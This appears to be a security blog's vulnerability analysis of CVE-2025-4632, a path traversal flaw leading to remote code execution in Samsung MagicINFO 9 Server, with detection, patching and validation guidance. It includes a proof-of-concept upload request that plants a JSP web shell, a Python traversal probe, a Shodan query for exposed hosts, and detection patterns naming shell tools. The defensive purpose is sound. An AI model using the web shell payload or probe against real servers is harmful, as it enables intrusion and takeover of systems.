Vulnerability Analysis

CVE-2025-4632: Samsung MagicINFO 9 Server Path Traversal → RCE & How to Fix It

Executive Summary

CVE-2025-4632 is a critical path traversal vulnerability (CVSS 9.8) in Samsung MagicINFO 9 Server — the content management platform used to push media to digital signage displays worldwide. Unauthenticated remote attackers can exploit the flaw to write arbitrary files anywhere on the underlying server, which trivially escalates to remote code execution by dropping a web shell. Exploitation is confirmed in the wild, with multiple threat actor groups — including operators of the Mirai botnet and the DragonForce ransomware operation — actively targeting unpatched instances. CISA added CVE-2025-4632 to its Known Exploited Vulnerabilities (KEV) catalog and mandated remediation across federal agencies. Patch immediately to version 21.1052 or later.

1. What Is This Vulnerability?

Background

Samsung MagicINFO 9 Server is an enterprise content management platform that lets administrators schedule and distribute media (images, video, HTML) to a fleet of networked digital signage displays. It exposes a web-based management console and a REST/HTTP API used by display devices to fetch content and by admins to upload new assets.

The server includes a file upload endpoint designed to accept media files for distribution. CVE-2025-4632 arises because that endpoint trusts a user-supplied filename (or path) parameter without adequately sanitizing path traversal sequences such as ../ (dot-dot-slash). This means an attacker who crafts a multipart HTTP POST request can redirect the file write to any directory accessible by the server process — which typically runs with elevated (SYSTEM-level) privileges on Windows.

Technical Breakdown

The root cause is classic CWE-22: Improper Limitation of a Pathname to a Restricted Directory — the server constructs a target file path by concatenating a base upload directory with a caller-provided filename, but fails to canonicalize or validate the resulting path before writing the file.

Simplified vulnerable path construction (pseudocode):

// VULNERABLE — user input not sanitized
String uploadDir = "C:\\MagicINFO\\upload\\";
String filename  = request.getParameter("filename");   // attacker-controlled
String target    = uploadDir + filename;               // traversal possible

FileOutputStream fos = new FileOutputStream(target);
fos.write(requestBody);
fos.close();

If filename is set to ../../../../webapps/ROOT/shell.jsp, the target resolves to a path inside the web application root, and the uploaded file becomes a live JSP web shell served by the application container.

No authentication is required. The upload endpoint is accessible without a valid session token, making this a zero-click, zero-auth remote exploit.

Note: CVE-2025-4632 is a patch bypass for CVE-2024-7399, an earlier path traversal in the same product patched in August 2024. Samsung's initial fix was incomplete — researchers found that attackers could still bypass it using alternate encoding or directory structures, prompting a second, more comprehensive fix released May 13, 2025.

Attack Vector

A typical exploitation sequence looks like this:

  1. Reconnaissance: Attacker scans the internet (e.g., via Shodan/Censys) for hosts exposing the MagicINFO management port (default: 7001/TCP or 80/443 if reverse-proxied).
  2. Initial write: Attacker sends a crafted multipart POST request to the upload endpoint with a path-traversal filename pointing to the web root.
  3. Web shell placement: The JSP/ASPX payload is written to a publicly accessible directory.
  4. Code execution: Attacker issues HTTP requests to the placed shell, executing OS commands as the server process user (often SYSTEM on Windows).
  5. Post-exploitation: Download and execute secondary payloads — Mirai agents, ransomware loaders, or lateral movement tools.

Proof-of-concept HTTP request (sanitized for demonstration):

POST /MagicInfo/fileUpload HTTP/1.1
Host: target.example.com:7001
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="Filedata"; filename="../../../../webapps/ROOT/pwn.jsp"
Content-Type: application/octet-stream

<%@ page import="java.io.*,java.util.*"%>
<%
  String cmd = request.getParameter("cmd");
  Process p = Runtime.getRuntime().exec(cmd);
  // ... output to response
%>
------Boundary--

Real-World Impact

Huntress Threat Intelligence documented three confirmed post-exploitation incidents involving CVE-2025-4632:

  • Incidents 1 & 2: Identical command sets downloading secondary binaries (srvany.exe, services.exe) — behavior consistent with persistence installation and process masquerading.
  • Incident 3: Reconnaissance commands executed, suggesting a staging phase before further exploitation.

Multiple Mirai botnet variants were observed leveraging the vulnerability to absorb MagicINFO servers into DDoS infrastructure. The DragonForce ransomware group was linked to separate campaigns using the related CVE-2024-57726/57728 (SimpleHelp) vulnerabilities in overlapping infrastructure, suggesting organized threat actor interest in unmanaged server software.

2. Who Is Affected?

Component Vulnerable Versions
Samsung MagicINFO 9 Server All versions prior to 21.1052
Samsung MagicINFO 8 and earlier Not officially supported; presumed vulnerable or unsupported

Risk factors that increase exposure:

  • MagicINFO management interface exposed directly to the internet (ports 7001, 8080, 80, 443)
  • Running the service under a high-privileged user account (SYSTEM/Administrator)
  • No network segmentation between signage management network and internal LAN
  • Legacy deployments that applied the CVE-2024-7399 patch but did not upgrade to 21.1052

Internet exposure: Censys and Shodan scans performed around the time of disclosure found thousands of MagicINFO instances accessible from the public internet, concentrated in retail, hospitality, healthcare, and government sectors — all prime targets for botnet operators or ransomware groups seeking privileged pivot points.

3. How to Detect It (Testing)

Manual Testing Steps

  1. Identify exposed instances: Search your network for hosts listening on ports commonly used by MagicINFO (7001, 8080, 80/443 with /MagicInfo path). Use your existing asset inventory or run: nmap -p 7001,8080 --open -sV <subnet>
  2. Check version: Navigate to the MagicINFO admin console → Help → About. Note the build/version string and compare against 21.1052.
  3. Attempt an unauthenticated probe (authorized test only): Without logging in, issue a GET to /MagicInfo/ and observe whether you receive a login page or direct application response. Confirm the server version in HTTP response headers (X-MagicInfo-Version or similar).
  4. Path traversal indicator (authorized pentest only): With written authorization, use a controlled payload that writes to an innocuous readable path and verify whether the file appears — this confirms active exploitation of the flaw.
  5. Check for existing compromise: Look for unexpected .jsp, .jspx, .war, or executable files in the web application directories (webapps/ROOT, webapps/MagicInfo).

Automated Scanning

Nuclei (ProjectDiscovery):

# A community-contributed Nuclei template exists for CVE-2025-4632
nuclei -t cves/2025/CVE-2025-4632.yaml -u https://target.example.com:7001

The template is tracked at projectdiscovery/nuclei-templates#12946. Pull the latest template repository before running.

Shodan/Censys (asset discovery):

# Shodan query to find exposed MagicINFO instances
http.title:"MagicInfo" port:7001

# Censys equivalent
services.http.response.html_title: "MagicInfo"

Nessus / Tenable: Plugins for CVE-2025-4632 and CVE-2024-7399 are available in the Tenable plugin feed. Run a credentialed scan targeting MagicINFO hosts and filter for plugin IDs covering these CVEs.

Code Review Checklist (if you self-host or have source access)

  • Verify file upload handler canonicalizes the resolved path (File.getCanonicalPath() in Java) before writing
  • Confirm resolved path starts with the expected upload directory prefix — reject if not
  • Ensure the upload endpoint requires a valid authenticated session token
  • Check that the server process account is least-privilege (not SYSTEM/root)
  • Confirm uploaded files are written outside the web application document root

4. How to Fix It (Mitigation)

Step-by-Step Remediation

  1. Upgrade to MagicINFO 9 Server version 21.1052 or later. This is the only complete fix. Download from the official Samsung MagicINFO support portal or contact your Samsung reseller.
  2. Verify the upgrade: After installation, confirm the version string in the admin console reflects 21.1052+. Check the changelog confirms inclusion of the CVE-2025-4632 fix.
  3. Restrict network access immediately (stop-gap while patching):
    • Place a firewall rule blocking all external/untrusted network access to MagicINFO ports (7001, 8080).
    • Limit access to management interfaces to trusted administrator IP ranges only.
    • If internet exposure is required for remote device management, move it behind a VPN or Zero Trust Network Access (ZTNA) gateway.
  4. Audit for existing compromise: Before or immediately after patching, inspect the web application directories for unexpected files, especially .jsp/.jspx files not part of the original installation.
  5. Rotate credentials and review service accounts: If compromise is suspected, rotate all MagicINFO admin credentials and review/restrict the OS-level service account.
  6. Re-deploy to a known clean state if compromise is confirmed — do not assume patching alone restores integrity once a web shell has been placed.

Configuration Hardening

Setting Recommended Configuration
Service account Dedicated low-privilege account — not SYSTEM/Administrator
Network exposure Internal network only; external access via VPN or ZTNA
Upload directory Outside web root; enforce via OS-level permissions
TLS Enforce HTTPS; disable HTTP on management ports
Admin access Restrict by IP allowlist; enable MFA if supported
Log retention Enable and centralize access logs for the management interface

5. How to Test the Fix (Validation)

Regression Test Scenarios

  • Scenario A — Patch applied successfully: Log into the admin console and confirm version ≥ 21.1052. Run the Nuclei CVE-2025-4632 template against the host and confirm no vulnerability detected.
  • Scenario B — Upload endpoint no longer accepts traversal: In an authorized test environment, replay a path-traversal upload request (from an unauthenticated session). Confirm the server returns a 400/403 error and does not write the file to the traversed path.
  • Scenario C — Normal upload functionality intact: Log in as an authorized admin and upload a valid media file. Confirm it is stored in the expected upload directory and is distributed to test displays correctly.
  • Scenario D — Network restriction effective: From an external host, attempt to reach the MagicINFO management port. Confirm connection is refused or timed out.

Security Test Case: Verify Vulnerability Is Closed

Test Case ID:   SEC-2025-4632-01
Precondition:   Patch 21.1052 applied; test environment authorized
Actor:          Unauthenticated attacker (penetration tester)
Steps:
  1. Issue a multipart POST to /MagicInfo/fileUpload without an auth token
     with filename=../../../../webapps/ROOT/test-probe.jsp
  2. Attempt to GET /test-probe.jsp from the web root
Expected Result:
  - Server returns HTTP 400, 403, or 401 on the upload request
  - The file does NOT appear in the web root
  - No JSP execution occurs
Pass/Fail:      Pass if file is NOT created; Fail if file is accessible

Automated Test (Python, for authorized lab use)

import requests, os

TARGET = "http://your-test-magicinfo-host:7001"
PROBE_FILENAME = "../../../../webapps/ROOT/cve_2025_4632_probe.txt"
PROBE_CONTENT  = b"CVE-2025-4632-TEST-PROBE"

# Step 1: Attempt path traversal upload (unauthenticated)
resp = requests.post(
    f"{TARGET}/MagicInfo/fileUpload",
    files={"Filedata": (PROBE_FILENAME, PROBE_CONTENT, "text/plain")},
    timeout=10
)
print(f"Upload response: {resp.status_code}")

# Step 2: Check whether probe file was placed in web root
probe_resp = requests.get(
    f"{TARGET}/cve_2025_4632_probe.txt", timeout=10
)
if probe_resp.status_code == 200 and b"CVE-2025-4632-TEST-PROBE" in probe_resp.content:
    print("[FAIL] VULNERABLE — path traversal write succeeded")
else:
    print("[PASS] Traversal blocked — upload rejected or file not accessible")

6. Prevention & Hardening

Best Practices

  • Never expose digital signage management interfaces to the internet. These platforms were designed for internal LAN/WAN use. If remote administration is required, use a VPN, ZTNA, or dedicated jump host.
  • Patch promptly for digital signage and "secondary" infrastructure. MagicINFO and similar platforms are commonly overlooked during vulnerability management cycles because they are not considered "critical servers" — but they run on high-privilege accounts and maintain persistent network connectivity, making them valuable pivot points.
  • Apply vendor updates systematically. Samsung released both CVE-2024-7399 (August 2024) and CVE-2025-4632 (May 2025) as targeted patches — organizations that applied 2024-7399 but didn't follow up with 21.1052 remained vulnerable for nearly a year. Subscribe to vendor security advisories.
  • Enforce least privilege for service accounts. The Mirai exploitation was amplified by MagicINFO running as SYSTEM. A dedicated low-privilege service account limits the blast radius of any file-write exploitation.
  • Segment signage networks. Isolate digital signage management infrastructure from corporate LAN and OT/ICS networks. Even if a signage server is compromised, network segmentation limits lateral movement.

Monitoring & Detection

Watch for the following indicators of compromise (IoCs) and behavioral signals:

Detection Signal Description
New .jsp / .jspx files in webapps/ROOT Unexpected web shell drop
Unauthenticated POST to /MagicInfo/fileUpload Exploitation attempt
Outbound connections to unusual IPs/ports Post-exploitation C2 or payload download
Execution of cmd.exe, powershell.exe, or wget/curl by the MagicINFO process Web shell command execution
srvany.exe, services.exe appearing in MagicINFO directory Documented Huntress IoC
High-volume outbound UDP traffic from MagicINFO host Mirai botnet DDoS participation

SIEM/EDR detection query (Windows Event Logs):

EventID: 4688 (process creation)
ParentProcessName: *magicinfo* OR *tomcat*
NewProcessName: *cmd.exe* OR *powershell.exe* OR *wscript.exe*

File Integrity Monitoring: Configure FIM on the MagicINFO webapps directory to alert on any new or modified .jsp, .war, or .exe files.

References

Latest from the blog

See all →